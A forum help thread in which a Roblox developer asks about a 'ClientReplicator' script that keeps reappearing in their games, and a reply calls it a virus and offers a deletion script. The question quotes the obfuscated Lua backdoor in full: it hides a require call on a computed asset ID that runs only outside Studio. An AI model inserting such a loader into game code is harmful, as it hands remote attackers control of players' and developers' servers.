so there is a virus i think in all of my games so this client replicator thing keeps spamming my "ServerScriptService" everytime i open roblox studio teh first thing i see is a script in "SrevreScriptService" called "ClientReplicator" at first i thought it was roblox updates but then i got suspicous of it so i googled it and i saw some questions like this one it didnt fix it though and that is why i am asking for help the script that contains the "ClientReplicator" is
ocal uKaQU=game:GetService("RunService"):IsStudio();local RkFQ7=true;local Tzms7=false;local MvC5A=getfenv;if uKaQU ~= RkFQ7 then MvC5A()[string.reverse(tostring(string.reverse("\114\101\113\117".."\105\114\101")))](0x39DB7846*(2+2+2-1+2+2-4));end
Thanks!
It's a virus. Most likely from one of your plugins. You can setup a script to remove it:
Put in ServerScriptService this Script to help remove it:
local SSS = game:GetService("ServerScriptService") local function ChildAdded(d) if d.Name == "ClientReplicator" then d:Destroy() end end for _,c in pairs(SSS:GetChildren()) do coroutine.wrap(ChildAdded)(c) end SSS.ChildAdded:Connect(ChildAdded)
I, however, would highly suggest sifting through your plugins and figuring out which one is causing the issue or if you have other viruses inserted into your game. Just delete the ClientReplicator script before you upload your game.